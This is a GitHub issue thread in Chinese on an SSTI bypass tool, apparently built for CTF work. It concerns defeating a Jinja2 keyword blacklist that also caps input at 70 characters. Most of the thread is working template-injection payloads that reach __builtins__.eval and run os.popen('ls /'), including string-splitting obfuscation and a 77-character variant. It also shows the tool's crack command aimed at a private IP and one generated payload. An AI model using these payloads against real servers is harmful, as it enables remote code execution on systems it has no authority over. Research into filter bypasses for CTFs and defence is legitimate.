### ISSUE TITLE
这个过滤条件没跑出payload

### ISSUE THREAD

**Issue by Lazzzaro** [Marven11/Fenjing#10]
~~~
def blacklist(inp):
    blacklist = ['mro','url','join','attr','dict','()','init','import','os','system','lipsum','current_app','globals','subclasses','|','getitem','popen','read','ls','flag.txt','cycler','[]','0','1','2','3','4','5','6','7','8','9','=','+',':','update','config','self','class','%','#']
    for b in blacklist:
        if b in inp:
            return "Blacklisted word!"
    if len(inp) <= 70:
        return inp
    if len(inp) > 70:
        return "Input too long!"
~~~

**Comment by Marven11** [comment]
如果没有长度限制的话加几条规则就可以跑出来了，payload是`{{(((((namespace[("_""_""i""n""i""t""_""_")])[("_""_""g""l""o""b""a""l""s""_""_")])[("_""_""b""u""i""l""t""i""n""s""_""_")])[("e""v""a""l")])(("_""_""i""m""p""o""r""t""_""_""(""'""o""s""'"")"".""p""o""p""e""n""(""'""l""s"" ""[/](https://file+.vscode-resource.vscode-cdn.net/)""'"")"".""r""e""a""d""("")")))}}`
但是加上长度限制之后我连手动都做不出来（

**Comment by Lazzzaro** [comment]
找到一个长度77的：`{{namespace["__ini""t__"][request.args.a].__builtins__.eval(request.args.b)}}`，暂时找不到更短的

**Comment by Marven11** [comment]
小改了一下生成器架构，现在最新版本(v0.5.0.2)可以生成对应的payload, 只需要`pip install -U fenjing`升级并使用crack功能的`--eval-args-payload`选项即可。比如说：`python -m fenjing crack --url 'http://10.137.0.28:5000' --method GET --inputs name --interval 0.1 --eval-args-payload`

现在fenjing生成的payload长这样：`/?name={{(g.pop['__global''s__'].__builtins__.eval(request.values.x))}}&x=__import__('os').popen('ls+/').read()`
